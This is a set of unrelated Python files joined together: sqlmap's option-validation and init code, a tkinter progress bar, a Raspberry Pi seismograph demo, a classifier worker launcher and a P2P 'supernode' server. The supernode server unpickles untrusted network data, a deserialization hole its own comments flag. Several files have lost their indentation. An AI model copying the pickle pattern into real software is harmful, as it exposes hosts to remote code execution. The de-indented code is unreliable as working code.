        errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    # --- regular expression validity checks ---
    if conf.regexp:
        try:
            re.compile(conf.regexp)
        except Exception, ex:
            errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex))
            raise SqlmapSyntaxException(errMsg)
    if conf.crawlExclude:
        try:
            re.compile(conf.crawlExclude)
        except Exception, ex:
            errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex))
            raise SqlmapSyntaxException(errMsg)
    if conf.dumpTable and conf.dumpAll:
        errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
        raise SqlmapSyntaxException(errMsg)
    if conf.predictOutput and (conf.threads > 1 or conf.optimize):
        errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
        raise SqlmapSyntaxException(errMsg)
    if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
        errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
        raise SqlmapSyntaxException(errMsg)
    # --- options requiring the presence of other options ---
    if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)):
        errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
        raise SqlmapSyntaxException(errMsg)
    if conf.crawlExclude and not conf.crawlDepth:
        errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safePost and not conf.safeUrl:
        errMsg = "option '--safe-post' requires usage of option '--safe-url'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
        errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
        raise SqlmapSyntaxException(errMsg)
    if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
        errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
        raise SqlmapSyntaxException(errMsg)
    if conf.csrfUrl and not conf.csrfToken:
        errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
        raise SqlmapSyntaxException(errMsg)
    if conf.csrfToken and conf.threads > 1:
        errMsg = "option '--csrf-url' is incompatible with option '--threads'"
        raise SqlmapSyntaxException(errMsg)
    if conf.requestFile and conf.url and conf.url != DUMMY_URL:
        errMsg = "option '-r' is incompatible with option '-u' ('--url')"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.proxy:
        errMsg = "option '-d' is incompatible with option '--proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.tor:
        errMsg = "option '-d' is incompatible with switch '--tor'"
        raise SqlmapSyntaxException(errMsg)
    if not conf.tech:
        errMsg = "option '--technique' can't be empty"
        raise SqlmapSyntaxException(errMsg)
    # --- proxy/Tor combination checks ---
    if conf.tor and conf.ignoreProxy:
        errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.tor and conf.proxy:
        errMsg = "switch '--tor' is incompatible with option '--proxy'"
        raise SqlmapSyntaxException(errMsg)
    if conf.proxy and conf.proxyFile:
        errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
        raise SqlmapSyntaxException(errMsg)
    if conf.checkTor and not any((conf.tor, conf.proxy)):
        errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
        raise SqlmapSyntaxException(errMsg)
    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
        errMsg = "value for option '--tor-port' must be in range 0-65535"
        raise SqlmapSyntaxException(errMsg)
    if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
        errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True))
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):
        errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
        raise SqlmapSyntaxException(errMsg)
    if conf.skip and conf.testParameter:
        errMsg = "option '--skip' is incompatible with option '-p'"
        raise SqlmapSyntaxException(errMsg)
    if conf.mobile and conf.agent:
        errMsg = "switch '--mobile' is incompatible with option '--user-agent'"
        raise SqlmapSyntaxException(errMsg)
    if conf.proxy and conf.ignoreProxy:
        errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'"
        raise SqlmapSyntaxException(errMsg)
    # --- value format checks ---
    if conf.timeSec < 1:
        errMsg = "value for option '--time-sec' must be a positive integer"
        raise SqlmapSyntaxException(errMsg)
    if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
        errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
        raise SqlmapSyntaxException(errMsg)
    if isinstance(conf.uCols, basestring):
        if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
            errMsg = "value for option '--union-cols' must be a range with hyphon "
            errMsg += "(e.g. 1-10) or integer value (e.g. 5)"
            raise SqlmapSyntaxException(errMsg)
    if conf.dbmsCred and ':' not in conf.dbmsCred:
        errMsg = "value for option '--dbms-cred' must be in "
        errMsg += "format <username>:<password> (e.g. \"root:pass\")"
        raise SqlmapSyntaxException(errMsg)
    if conf.charset:
        _ = checkCharEncoding(conf.charset, False)
        if _ is None:
            errMsg = "unknown charset '%s'. Please visit " % conf.charset
            errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
            errMsg += "supported charsets"
            raise SqlmapSyntaxException(errMsg)
        else:
            # replace with the canonical (resolved) charset name
            conf.charset = _
    if conf.loadCookies:
        if not os.path.exists(conf.loadCookies):
            errMsg = "cookies file '%s' does not exist" % conf.loadCookies
            raise SqlmapFilePathException(errMsg)
def _resolveCrossReferences():
    # Inject locally defined callables into sibling modules; this breaks
    # circular-import dependencies between the lib.* packages at runtime
    lib.core.threads.readInput = readInput
    lib.core.common.getPageTemplate = getPageTemplate
    lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
    lib.request.connect.setHTTPHandlers = _setHTTPHandlers
    lib.utils.search.setHTTPHandlers = _setHTTPHandlers
    lib.controller.checks.setVerbosity = setVerbosity
    lib.controller.checks.setWafFunctions = _setWafFunctions
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
    # Reset conf/kb singletons, then merge the provided options on top.
    # NOTE(review): the mutable default argument (AttribDict()) is shared
    # between calls - appears safe as it is only read here, but confirm
    _setConfAttributes()
    _setKnowledgeBaseAttributes()
    _mergeOptions(inputOptions, overrideOptions)
def init():
    """
    Set attributes into both configuration and knowledge base singletons
    based upon command line and configuration file options.

    NOTE: the call order below is significant (e.g. proxy/Tor setup must
    precede anything that opens connections).
    """
    # --- phase 1: option post-processing and environment preparation ---
    _useWizardInterface()
    setVerbosity()
    _saveConfig()
    _setRequestFromFile()
    _cleanupOptions()
    _cleanupEnvironment()
    _dirtyPatches()
    _purgeOutput()
    _checkDependencies()
    _createTemporaryDirectory()
    _basicOptionValidation()
    # --- phase 2: networking, targets and auxiliary machinery ---
    _setProxyList()
    _setTorProxySettings()
    _setDNSServer()
    _adjustLoggingFormatter()
    _setMultipleTargets()
    _setTamperingFunctions()
    _setWafFunctions()
    _setTrafficOutputFP()
    _resolveCrossReferences()
    _checkWebSocket()
    parseTargetUrl()
    parseTargetDirect()
    # --- phase 3: HTTP stack setup (only when there is something to connect to) ---
    if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
        _setHTTPTimeout()
        _setHTTPExtraHeaders()
        _setHTTPCookies()
        _setHTTPReferer()
        _setHTTPHost()
        _setHTTPUserAgent()
        _setHTTPAuthentication()
        _setHTTPHandlers()
        _setDNSCache()
        _setSocketPreConnect()
        _setSafeVisit()
        _doSearch()
        _setBulkMultipleTargets()
        _setSitemapTargets()
        _checkTor()
        _setCrawler()
        _findPageForms()
        _setDBMS()
        _setTechnique()
    # --- phase 4: engine configuration and payload loading ---
    _setThreads()
    _setOS()
    _setWriteFile()
    _setMetasploit()
    _setDBMSAuthentication()
    loadBoundaries()
    loadPayloads()
    _setPrefixSuffix()
    update()
    _loadQueries()
|
progressbar.py | """
Reference:
tkinter_progress.py
https://gist.github.com/MattWoodhead/c7c51cd2beaea33e1b8f5057f7a7d78a
"""
import threading
import tkinter as tk
from tkinter import ttk
class ProgressBar():
    """Threaded progress bar for a tkinter GUI."""

    def __init__(self, parent, row, column, columnspan):
        """Create an indeterminate ttk.Progressbar, grid it and start it.

        parent -- container widget; row/column/columnspan -- grid placement.
        """
        self.maximum = 100
        self.interval = 10  # animation step interval, in milliseconds
        self.progressbar = ttk.Progressbar(parent,
                                           orient=tk.HORIZONTAL,
                                           mode="indeterminate",
                                           maximum=self.maximum)
        self.progressbar.grid(row=row, column=column,
                              columnspan=columnspan, sticky="we")
        # BUG FIX: the original passed 'target=self.progressbar.start(self.interval)',
        # which *called* start() immediately and handed the thread a None target.
        # Pass the callable and its argument separately instead.
        self.thread = threading.Thread(
            target=self.progressbar.start, args=(self.interval,))
        self.thread.start()

    def start_progressbar(self):
        """Resume the indeterminate animation, keeping the current value."""
        # is_alive(): the camelCase isAlive() alias was removed in Python 3.9
        if not self.thread.is_alive():
            v = self.progressbar["value"]
            self.progressbar.configure(mode="indeterminate",
                                       maximum=self.maximum,
                                       value=v)
            self.progressbar.start()

    def stop_progressbar(self):
        """Freeze the animation while preserving the current value."""
        if not self.thread.is_alive():
            v = self.progressbar["value"]
            self.progressbar.stop()
            self.progressbar["value"] = v

    def clear_progressbar(self):
        """Stop the animation and reset the bar to zero."""
        if not self.thread.is_alive():
            self.progressbar.stop()
            self.progressbar.configure(mode="determinate", value=0)

    def complete_progressbar(self):
        """Stop the animation and fill the bar completely."""
        if not self.thread.is_alive():
            self.progressbar.stop()
            self.progressbar.configure(mode="determinate",
                                       maximum=self.maximum,
                                       value=self.maximum)
def print_message():
    """Print a short message proving that a separate thread is running."""
    message = "proof a separate thread is running"
    print(message)
class AppGUI(tk.Frame):
    """class to define tkinter GUI"""

    def __init__(self, parent):
        super(AppGUI, self).__init__(master=parent)
        progressbar = ProgressBar(parent, row=0, column=0, columnspan=2)

        # (label, callback, grid placement) for every control button
        button_specs = [
            ("start", progressbar.start_progressbar,
             dict(row=1, column=0)),
            ("stop", progressbar.stop_progressbar,
             dict(row=1, column=1)),
            ("complete", progressbar.complete_progressbar,
             dict(row=2, column=0)),
            ("clear", progressbar.clear_progressbar,
             dict(row=2, column=1)),
            ("thread test", print_message,
             dict(row=3, column=0, columnspan=2, sticky="we")),
        ]
        for label, callback, placement in button_specs:
            ttk.Button(parent, text=label, command=callback).grid(**placement)
def main():
    """Build the Tk root window, attach the GUI and enter the event loop."""
    root = tk.Tk()
    AppGUI(root)
    root.mainloop()


if __name__ == '__main__':
    main()
|
seismograph.py | #!/usr/bin/env python3
import os
import time
import sys
try:
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
except ImportError:
print("""This example requires PIL.
Install with: sudo apt install python{v}-pil
""".format(v="" if sys.version_info.major == 2 else sys.version_info.major))
sys.exit(1)
from lsm303d import LSM303D
from threading import Thread
from luma.core.interface.serial import spi
from luma.core.render import canvas
from luma.oled.device import sh1106
print("""This Pimoroni Breakout Garden example requires an
LSM303D 6DoF Breakout and a 1.12" OLED Breakout (SPI).
The Dino-Detect v1.2 beta is a dino stomp detector. It's a
UNIX system, I know this.
Press Ctrl+C to exit.
""")
# Set up OLED (SH1106 128x128 over SPI, rotated 180 degrees)
oled = sh1106(spi(port=0, device=1, gpio_DC=9), rotate=2, height=128, width=128)

# Load fonts from the 'fonts' directory next to this script
rr_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'fonts', 'Roboto-Regular.ttf'))
print(rr_path)  # debug output of the resolved font path
rb_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'fonts', 'Roboto-Black.ttf'))
# NOTE(review): rr_24 and rb_20 appear unused in the visible code - confirm
rr_24 = ImageFont.truetype(rr_path, 24)
rb_20 = ImageFont.truetype(rb_path, 20)
rr_12 = ImageFont.truetype(rr_path, 12)

# Set up LSM303D motion sensor (I2C address 0x1d)
lsm = LSM303D(0x1d)

samples = []
points = []  # rolling window of scaled accelerometer readings (max 96)

sx, sy, sz = lsm.accelerometer()  # Starting values to zero out accelerometer

sensitivity = 5  # Value from 1 to 10. Determines twitchiness of needle
# Function to thread accelerometer values separately to OLED drawing
def sample():
    """Continuously read the accelerometer and append scaled values to 'points'."""
    while True:
        ax, ay, az = lsm.accelerometer()

        # Zero out using the readings captured at startup;
        # change this axis depending on orientation of breakout
        reading = ay - sy

        # Scale up or down depending on sensitivity required;
        # negative deflections are amplified more than positive ones
        factor = (100 if reading < 0 else 40) * sensitivity
        reading *= factor

        # Only keep 96 most recent values in list
        points.append(reading)
        del points[:-96]

        time.sleep(0.05)
# The daemon thread that measures accelerometer values in the background
t = Thread(target=sample)
t.daemon = True
t.start()

# Wait for at least one data point; sleep instead of the original
# busy-wait ('pass') loop, which pinned a CPU core at 100%
while len(points) == 0:
    time.sleep(0.01)
# The main loop that draws values to the OLED (runs until Ctrl+C)
while True:
    background = Image.open("images/seismograph.png").convert(oled.mode)
    draw = ImageDraw.ImageDraw(background)

    # Draw the needle as three adjacent lines (1px thick each) from the
    # right edge to the latest reading
    draw.line([(128, 64), (96, 64 + points[-1])], fill="white")
    draw.line([(128, 63), (96, 64 + points[-1])], fill="white")
    draw.line([(128, 65), (96, 64 + points[-1])], fill="white")

    # Draw the seismograph trace
    for i in range(1, len(points)):
        draw.line([(i - 1, 64 + points[i - 1]), (i, 64 + points[i])], fill="white")

    # Draw the Dino-Detect "branding"
    draw.rectangle([(0, 0), (128, 20)], fill="black")
    draw.text((0, 1), "AUS (A UNIX System)", fill="white", font=rr_12)
    draw.line([(0, 20), (128, 20)], fill="white")
    draw.rectangle([(0, 108), (128, 128)], fill="black")
    draw.text((0, 110), "Dino-Detect v1.2 BETA", fill="white", font=rr_12)
    draw.line([(0, 108), (128, 108)], fill="white")

    # Display on the OLED
    oled.display(background)
|
model_workers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Start workers to create model for all categories."""
import time
import argparse
import threading
from subprocess import call
from unidecode import unidecode
from caterpy.url_lists import return_url_lists
def return_args():
    """Get some args to start update classifiers."""
    parser = argparse.ArgumentParser(add_help=True, description=(
        "Get some args to pass to update_classifiers script."))

    parser.add_argument("-c", "--category", action="store", default="all",
                        help="Pass category, url or all categories.")
    parser.add_argument("-u", "--unknow", action="store_true", default=False,
                        help="Get word from unknow urls into url parsed.")
    parser.add_argument("-e", "--english", action="store_true",
                        default=False, help="Save only words in english.")

    return parser.parse_args()
def worker_cat(cat, en, unknow):
    """Run update_classifiers.py for a single category in a subprocess.

    cat -- category name or URL; en/unknow -- "-e"/"-u" flag strings or "".
    """
    # SECURITY FIX: the original interpolated 'cat' (a command-line supplied
    # category or URL) into a shell=True string, which broke on spaces/quotes
    # and allowed shell injection. Use an argument list with shell=False.
    cmd = ["/usr/bin/python3", "update_classifiers.py", "-c", cat]
    cmd.extend(flag for flag in (en, unknow) if flag)
    call(cmd)
if __name__ == "__main__":
opts = return_args()
url_lists = return_url_lists()
if opts.category == "all":
cats = set([c for c in url_lists])
elif opts.category.startswith('http'):
cats = set([opts.category])
else:
cats = set([c for c in url_lists if unidecode(c) == unidecode(
opts.category)])
if opts.english:
en = "-e"
else:
en = ""
if opts.unknow:
unknow = "-u"
else:
unknow = ""
while len(cats) != 0:
if threading.active_count() > 10:
time.sleep(30)
else:
cat = cats.pop()
start_worker = threading.Thread(
target=worker_cat, args=[cat, en, unknow])
start_worker.start()
|
supernode.py | # broadcasting port number : 44444
# livestatus port number : 12121
# handleFile() sharing port : 9005
# supernode to supernode communication PORT : 9999
# showFile : 9001
# findFile : 9002, 9003
# reqHandler : 9090
# add superNode broadcast req : 11000
# superNode file update info : 11001
# ACK to supernode for assigning SuperNode 8090
# superNode to supernode file info sharing(first time only) : 11002
import socket
import subprocess
import threading
import os
import time
import pickle
from collections import defaultdict
#PORT Mappings
PORT_updateSuperNode = 11001  # supernode -> supernode file add/delete updates
PORT_superNodeFileCache = 11002  # one-time full file-cache transfer between supernodes
PORT_sync = 9191  # TCP handshake used when two supernodes discover each other
myIPAddr = ""  # this host's primary IP; populated by myIP() at startup
# containing objects of Node
childNodes = {} #{IPAddr->Node}
fileCache = defaultdict(list) #{fileName -> [IPAddr,...]}
superNodeList = []  # IPs of the other known supernodes
def myIP():
    """Discover this host's primary IP (first field of `hostname -I`) and
    cache it in the module-global myIPAddr."""
    global myIPAddr
    shell_cmd = 'hostname -I | awk \'{print $1}\''
    raw = subprocess.check_output(['bash', '-c', shell_cmd])
    myIPAddr = raw.strip('\n')
# ---------------------Inter Super node communication---------------------
def recvFileCache():
print ("----inside recv file cache---")
global fileCache
tempCache = recvObj(PORT_superNodeFileCache, 10)
if len(fileCache)==0 and tempCache is not None:
print tempCache
fileCache = tempCache
def sendFileCache(ipAddr):
    """Push our entire file cache to the supernode at `ipAddr`."""
    sendObj(PORT_superNodeFileCache, ipAddr, fileCache)
# run on a thread to alter the supernode list
def setSuperNodes():
    """Join the supernode overlay, then listen forever for new supernodes.

    Runs on its own thread. After the one-time bootstrap (getSuperNodes1),
    every broadcast received on port 11000 from an unknown, non-local
    address triggers a sync (getSuperNodes2) and is added to superNodeList.
    """
    getSuperNodes1()
    # accept requests to become superNode
    sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
    sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sNode.bind(("", 11000))
    while True:
        # continuously listen for broadcast msgs
        data, addr = sNode.recvfrom(5096)
        if data != '':
            if addr[0] not in superNodeList and addr[0]!= myIPAddr:
                print "New Connected SuperNode :-"+addr[0]+"-"
                getSuperNodes2(addr[0])
                superNodeList.append(addr[0])
# send a broadcast message once to add your ip to all other supernodes.
def getSuperNodes1():
    """Bootstrap into the supernode overlay (run once at startup).

    Broadcasts our presence on port 11000, listens briefly (2s) for another
    supernode's broadcast, records it in superNodeList, sends it a TCP
    hello on PORT_sync, and finally pulls its file cache via recvFileCache().
    """
    broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    broadcast.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    # Set a timeout so the socket does not block
    # indefinitely when trying to receive data.
    broadcast.settimeout(5)
    broadcast.bind(("", 44444))
    message = "I'm a superNode"
    broadcast.sendto(message, ('<broadcast>', 11000))
    broadcast.close()
    # Listen briefly on the announce port for a reply from an existing
    # supernode; the 2s timeout keeps startup from hanging when we are first.
    sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
    sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sNode.bind(("", 11000))
    sNode.settimeout(2)
    tempaddr = ""
    try:
        data, addr = sNode.recvfrom(5096)
        tempaddr = addr[0]
        if data != '':
            if addr[0] not in superNodeList and addr[0]!= myIPAddr:
                print "New Connected SuperNode2 :-"+addr[0]+"-"
                superNodeList.append(addr[0])
    except socket.error, exc:
        # A timeout here simply means no other supernode answered.
        print "Some Error in Supernode 1",exc
    sNode.close()
    #sync messages
    # Best-effort TCP hello to the discovered peer; errors are logged only.
    # NOTE(review): if no peer replied, tempaddr is "" and connect() falls
    # into the except branch — confirm this is the intended no-peer path.
    TCP_IP = tempaddr
    TCP_PORT = PORT_sync
    BUFFER_SIZE = 5096
    p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        p.connect((str(TCP_IP), TCP_PORT))
        p.send("hola, amoebas!")
        p.close()
    except socket.error , exc:
        print "Error Caught : ",exc
    recvFileCache()
    print("________________cache after rec cache________________")
    print(fileCache)
    print("______________________________________________________")
def getSuperNodes2(addr):
    """Handshake with the newly-seen supernode at `addr`, then push our cache.

    Re-broadcasts our presence on port 11000, blocks until the peer connects
    on PORT_sync, and finally sends the whole fileCache to `addr`.
    """
    broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    broadcast.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    # Set a timeout so the socket does not block
    # indefinitely when trying to receive data.
    broadcast.settimeout(5)
    broadcast.bind(("", 44444))
    message = "I'm a superNode"
    broadcast.sendto(message, ('<broadcast>', 11000))
    broadcast.close()
    # time.sleep(4)
    #sync messages
    # Accept one sync connection from the peer before sharing the cache.
    TCP_IP = myIPAddr
    TCP_PORT = PORT_sync
    BUFFER_SIZE = 5096
    tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    tcpsock.bind((TCP_IP, TCP_PORT))
    # tcpsock.settimeout(tout)
    try:
        tcpsock.listen(5)
        (conn, (ip, port)) = tcpsock.accept()
        msg = conn.recv(5096)
        tcpsock.close()
    except socket.error as e:
        print "files addition socket timeout : " + TCP_IP
        tcpsock.close()
        return
    # NOTE(review): the socket was already closed in the try branch; this
    # second close is redundant.
    tcpsock.close()
    sendFileCache(addr)
    print("------------------cache after send file------------")
    print(fileCache)
    print("________________________________________________")
# continuously listen for updates regarding the files meta information
# maintain same set of file information across all superNodes.
def getUpdates():
    """Apply file add/delete updates pushed by peer supernodes (runs forever).

    Listens on PORT_updateSuperNode. Each message is a pickled list of
    6-tuples (name, v1, v2, v3, v4, action) where action is "add" or
    "delete"; entries are mirrored into childNodes[myIPAddr].fileMap and the
    global fileCache.
    """
    BUFFER_SIZE = 5096
    tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    print("---------in get Update s->>>>>>>>"+str(myIPAddr)+"<<<<<<<,,")
    tcpsock.bind((myIPAddr, PORT_updateSuperNode))
    while True:
        tcpsock.listen(5)
        print "----update superNode waiting=--------"
        (conn, (ip,port)) = tcpsock.accept()
        print 'Got connection from ', (ip,port)
        data, addr = conn.recvfrom(5096)
        if data !='':
            print "---------------------updating superNode -------------------"
            print data
            # SECURITY NOTE(review): pickle.loads on data received from the
            # network is unsafe if peers are untrusted.
            msg = pickle.loads(data)
            for x in msg:
                print x
                if(x[5] == "add"):
                    print "adding files -->"+ myIPAddr +"-->fileName-->"+ x[0]
                    childNodes[myIPAddr].fileMap[x[0]] = File(x[0], x[1], x[2], x[3], x[4])
                    fileCache[x[0]].append(myIPAddr)
                elif(x[5] == "delete"):
                    print "deleting files -->"+ myIPAddr+"-->filename-->"+ x[0]
                    del(childNodes[myIPAddr].fileMap[x[0]])
                    fileCache[x[0]].remove(myIPAddr)
                    # Drop the cache entry entirely once no node holds the file.
                    if(len(fileCache[x[0]])==0):
                        del(fileCache[x[0]])
        conn.close()
    # Unreachable: the accept loop above never exits.
    tcpsock.close()
# Whenever our fileCache is updated send the updated file meta information to
# other supernodes.
def sendUpdates(data):
    """Forward a file add/delete update list to every known peer supernode."""
    print("___--inside send updates _______")
    for peer in superNodeList:
        print("_____superNode fella->"+str(peer)+"<_____")
        sendObj(PORT_updateSuperNode, peer, data)
# -------------------------end super node comm----------------------------
class Node:
    """A child node tracked by this supernode, identified by its IP address."""

    def __init__(self, IPAddr, liveStatus):
        self.IPAddr = IPAddr          # dotted-quad string identifying the node
        self.liveStatus = liveStatus  # True while the node answers heartbeats
        self.fileMap = {}             # fileName -> File metadata record

    def __eq__(self, other):
        """Two Nodes are equal iff their IP addresses match."""
        if not isinstance(other, Node):
            # don't attempt to compare against unrelated types
            return NotImplemented
        return self.IPAddr == other.IPAddr
class File:
    """Metadata record for a shared file: its name plus four opaque values
    (h1..h4) supplied by the reporting client."""

    def __init__(self, name, h1, h2, h3, h4):
        self.name = name
        for attr, value in zip(("h1", "h2", "h3", "h4"), (h1, h2, h3, h4)):
            setattr(self, attr, value)
# recv an object via TCP socket
def recvObj(port, tout = 4):
TCP_IP = myIPAddr
TCP_PORT = port
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(tout)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(5096)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
# send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 5096
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
except socket.error , exc:
print "Error Caught : ",exc
# thread running continuously to cater to the requests made by the clients
# port 9090
def reqHandler():
    """Serve client queries forever on UDP port 9090.

    Dispatches "showFiles" to showFile() and "findFile" to findFile(),
    replying to the sender's address in both cases.
    """
    sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
    sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sNode.bind(("", 9090))
    while True:
        # continuously listen for broadcast msgs
        data, addr = sNode.recvfrom(5096)
        if data == "showFiles" :
            print "Inside reqhandler showfile :",addr[0]
            showFile(addr[0])
        elif data == "findFile":
            print "Inside reqhandler Findfile :",addr[0]
            findFile(addr[0])
# returns the list of all filenames from alive nodes.
# PORT 9001
def showFile(IPAddr):
    """Send the list of all known filenames to the client at `IPAddr`.

    Replies on port 9001 with the keys of the global fileCache.
    """
    # Idiom: list(mapping) yields its keys directly; replaces the manual
    # append loop of the original.
    sendObj(9001, IPAddr, list(fileCache))
# gets filename and returns list of IP
# PORT 9002, 9003
def findFile(IPAddr):
filename = recvObj(9002)
print "Filename : ",filename
sendObj(9003, IPAddr, fileCache[filename])
def handleFiles(IPAddr):
    """Receive a child node's file add/delete list and apply it everywhere.

    Accepts one TCP connection on port 44445 (10s timeout), unpickles a list
    of 6-tuples (name, v1, v2, v3, v4, action), forwards it to the other
    supernodes via sendUpdates(), then applies it to childNodes[IPAddr].fileMap
    and the global fileCache.
    """
    print ("_______handle files _________"+ str(IPAddr)+"_______________")
    TCP_IP = myIPAddr
    TCP_PORT = 44445
    BUFFER_SIZE = 5096
    tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    tcpsock.bind((TCP_IP, TCP_PORT))
    tcpsock.settimeout(10)
    try:
        tcpsock.listen(5)
        (conn, (ip, port)) = tcpsock.accept()
        msg = conn.recv(5096)
        # print ("____________________")
        print msg
        # print ("____________________")
        # SECURITY NOTE(review): pickle.loads on network data is unsafe if
        # the peer is untrusted.
        data = pickle.loads(msg)
        #push file updates to all the supernodes
        sendUpdates(data)
        print "----------"
        for x in data:
            print x
            if(x[5] == "add"):
                print "adding files -->"+ IPAddr +"-->fileName-->"+ x[0]
                childNodes[IPAddr].fileMap[x[0]] = File(x[0], x[1], x[2], x[3], x[4])
                print("_____________debugging ki ma_________________________")
                print("filecahce->", fileCache)
                print("x[0]", x[0])
                print("IPADDR->", IPAddr)
                print(fileCache[x[0]])
                print("_______________________________________________________")
                fileCache[x[0]].append(IPAddr)
            elif(x[5] == "delete"):
                print "deleting files -->"+ IPAddr+"-->filename-->"+ x[0]
                del(childNodes[IPAddr].fileMap[x[0]])
                fileCache[x[0]].remove(IPAddr)
                # Drop the cache entry once no node holds the file.
                if(len(fileCache[x[0]])==0):
                    del(fileCache[x[0]])
        print "----------"
        # Dump the node's resulting file list for debugging.
        x = childNodes[IPAddr]
        for y in x.fileMap:
            print(x.fileMap[y].name)
        tcpsock.close()
        print "Exiting Try Staement in Handle Files"
        return
    except socket.error ,exc:
        print "Error in HandleFile : ",exc
        print "files addition socket timeout : " + TCP_IP
        tcpsock.close()
        return
    # Unreachable: both branches above return.
    print "Exiting Handle Files"
def assignSuperNode():
    """Answer client discovery broadcasts and register ACKing clients.

    Listens forever on UDP 37020; replies with our IP, then waits (5s) on
    port 8090 for the client's "ACK" before adding it to (or reviving it in)
    childNodes and pulling its file list via handleFiles().
    """
    # accept requests to become superNode
    sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
    sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sNode.bind(("", 37020))
    while True:
        # continuously listen for broadcast msgs
        data, addr = sNode.recvfrom(5096)
        if data != '':
            # print("____________"+data+"___________")
            # print("____________"+myIPAddr+"___________")
            # print("____________"+addr[0]+"___________")
            sNode.sendto(myIPAddr, addr)
            print "Receive New Connection : ",addr[0]
            ## ACK Listening Start
            tempNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
            tempNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            tempNode.bind((myIPAddr, 8090))
            tempNode.settimeout(5)
            try:
                data1, addr1 = tempNode.recvfrom(5096)
                tempNode.close()
                print "Data :",data1," Message :",addr[0]
                if data1 == "ACK":
                    if childNodes.get(addr[0]) is not None:
                        # Known node coming back online: mark alive, resync files.
                        childNodes[addr[0]].liveStatus = True
                        print('----------dead to alive-------')
                        #TODO
                        handleFiles(addr[0])
                    else:
                        # Brand-new child node.
                        childNodes[addr[0]]=(Node(addr[0], True))
